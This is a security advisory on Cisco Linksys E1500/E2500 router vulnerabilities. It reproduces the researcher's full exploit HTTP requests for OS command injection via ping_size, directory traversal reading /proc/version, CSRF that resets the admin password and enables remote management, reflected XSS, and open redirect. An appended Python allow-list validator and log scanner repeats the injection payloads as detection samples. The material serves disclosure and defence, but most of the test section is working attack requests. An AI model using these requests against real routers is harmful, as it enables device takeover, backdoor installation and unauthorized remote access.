Multiple Security Vulnerabilities in Cisco Linksys E1500/E2500 Routers


Release date: 2013-02-06
Update date: 2013-02-19

Affected systems:
Cisco Linksys E1500 1.0.05 - build 1
Cisco Linksys E1500 1.0.04 - build 2
Cisco Linksys E1500 1.0.00 - build 9
Cisco Linksys E2500 1.0.03
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57760

The Cisco Linksys E1500/E2500 are Wireless-N routers that use SpeedBoost technology.

The Linksys E1500/E2500 implementation contains a command injection vulnerability, a security bypass vulnerability, a cross-site request forgery vulnerability, a cross-site scripting vulnerability, a directory traversal vulnerability and a URI redirection vulnerability. An attacker can exploit these vulnerabilities to execute arbitrary commands, carry out phishing attacks, bypass security restrictions, steal cookies, read system and other configuration files, and perform unauthorized actions in the context of the user's session.
 
1. OS command injection.
 Parameter: ping_size=%26ping%20192%2e168%2e178%2e102%26
 This vulnerability is caused by missing input validation of the ping_size parameter.
2. Directory traversal.
 Parameter: next_page
3. The existing password can be changed without entering the current password.
4. CSRF vulnerability: the password can be changed without knowing the current one. An attacker can also enable remote management.
5. Reflected cross-site scripting.
 Parameter: wait_time=3'%3balert('pwnd')//
6. Redirection vulnerability.
 Parameter: submit_button=http://www.pwnd.pwnd%0a
 
<*Source: Michael Messner (michae.messner@integralis.com)

  Link: http://www.s3cur1ty.de/node/655
 *>

Test method:
--------------------------------------------------------------------------------

Warning

The following programs (methods) may be offensive in nature and are provided for security research and teaching purposes only. Users bear the risk themselves!
Michael Messner (michae.messner@integralis.com) provided the following test method:
 
============ Vulnerability Overview: ============
 
OS Command Injection / E1500 and E2500 v1.0.03
 => Parameter: ping_size=%26ping%20192%2e168%2e178%2e102%26
 
The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device.
 You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.
 
Example Exploit:
 POST /apply.cgi HTTP/1.1
 Host: 192.168.178.199
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.178.199/Diagnostics.asp
 Authorization: Basic xxxx
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 185
 Connection: close
 
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip=
 Changing the request method from HTTP POST to HTTP GET makes the exploitation easier:
 
http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip=
 

Directory traversal - tested on E1500:
 => parameter: next_page
 
Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.
 
Request:
 POST /apply.cgi HTTP/1.1
 Host: 192.168.178.199
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.178.199/Wireless_Basic.asp
 Authorization: Basic YWRtaW46YWRtaW4=
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 75
 
submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version
 Response:
 HTTP/1.1 200 Ok
 Server: httpd
 Date: Thu, 01 Jan 1970 00:00:29 GMT
 Cache-Control: no-cache
 Pragma: no-cache
 Expires: 0
 Content-Type: text/html
 Connection: close
 
Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012
 

When changing the current password, the current password is not requested - tested on E1500
 With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.
 
Example Request:
 POST /apply.cgi HTTP/1.1
 Host: 192.168.1.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.1.1/Management.asp
 Authorization: Basic xxxx
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 311
 
submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
 CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management - tested on E1500:
 http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
 Reflected Cross Site Scripting - tested on E1500
 => Parameter: wait_time=3'%3balert('pwnd')//
 
Injecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input.
 
Example Exploit:
 POST /apply.cgi HTTP/1.1
 Host: 192.168.178.199
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.178.199/Wireless_Basic.asp
 Authorization: Basic xxxx
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 300
 
submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0
 

Redirection - tested on E1500
 => Parameter: submit_button=http://www.pwnd.pwnd%0a
 
Injecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input.
 
Example Exploit:
 POST /apply.cgi HTTP/1.1
 Host: 192.168.178.199
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.178.199/Wireless_Basic.asp
 Authorization: Basic xxxx
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 290
 
submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0
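Every issue above traces back to apply.cgi accepting parameter values it should never see: a shell metacharacter in ping_size, path separators in next_page, a quote in wait_time, a URL in submit_button. The following is an added example (it is not part of the advisory or of the researcher's material) showing the allow-list validation a hardened handler would apply to those parameters, and the same rules run over access-log lines to flag the requests shown above. The rules, the KNOWN_PAGES set and the log lines are assumptions constructed for this example; the firmware's real handler code is not on the page.

```python
"""Allow-list validation and log detection for the Linksys apply.cgi parameters
named in the advisory.  Added example; the rules are assumptions about what a
hardened handler should accept, not the firmware's own code."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed allow-list: the page names the advisory shows as legitimate
# submit_button values.  A real deployment would enumerate every page.
KNOWN_PAGES = {"Diagnostics", "Wireless_Basic", "Management"}

# Parameter rules: name -> predicate returning True for an acceptable value.
RULES = {
    # Packet size, count and wait time must be small positive integers, so
    # "&ping ...&" or "3';alert(...)//" are rejected before reaching a shell
    # or an HTML page.
    "ping_size": lambda v: v.isdigit() and 0 < int(v) <= 65500,
    "ping_times": lambda v: v.isdigit() and 0 < int(v) <= 100,
    "wait_time": lambda v: v.isdigit() and int(v) <= 600,
    # next_page is a bare page name (assumed "<name>.asp" or empty): no path
    # separators, no parent-directory references.
    "next_page": lambda v: v == "" or re.fullmatch(r"[A-Za-z0-9_]+\.asp", v) is not None,
    # submit_button selects a page by name; URLs and control characters fail.
    "submit_button": lambda v: v in KNOWN_PAGES,
}


def validate_apply_cgi(query):
    """Return (param, decoded_value) pairs that violate the allow-list rules."""
    params = parse_qs(query, keep_blank_values=True)
    violations = []
    for name, check in RULES.items():
        for value in params.get(name, []):
            if not check(value):
                violations.append((name, value))
    return violations


# Constructed access-log lines (combined format): a benign ping, the ping_size
# injection from the advisory as a GET, and the next_page traversal.
SAMPLE_LOG = """\
192.168.178.5 - - [06/Feb/2013:10:00:01 +0100] "GET /apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=32&ping_times=5&traceroute_ip= HTTP/1.1" 200 512
192.168.178.5 - - [06/Feb/2013:10:00:07 +0100] "GET /apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip= HTTP/1.1" 200 512
192.168.178.5 - - [06/Feb/2013:10:00:12 +0100] "GET /apply.cgi?submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version HTTP/1.1" 200 128
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def scan_access_log(text):
    """Return (line_number, violations) for apply.cgi requests whose parameters
    fall outside the allow-list.  Only GET requests expose their parameters in
    an access log; POST bodies need a proxy or packet capture to inspect."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != "/apply.cgi":
            continue
        violations = validate_apply_cgi(url.query)
        if violations:
            hits.append((lineno, violations))
    return hits


if __name__ == "__main__":
    for lineno, violations in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {violations}")
```

The validator works on decoded values, so percent-encoding (`%26`, `%3b`, `%0a`) does not help a request slip past it, and the allow-list approach means the CSRF and password-change requests still need a separate fix (an anti-CSRF token and a current-password check), which no parameter rule can provide.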

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Cisco
 -----
 The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's home page for the latest version:

http://tools.cisco.com/security/center/home.x
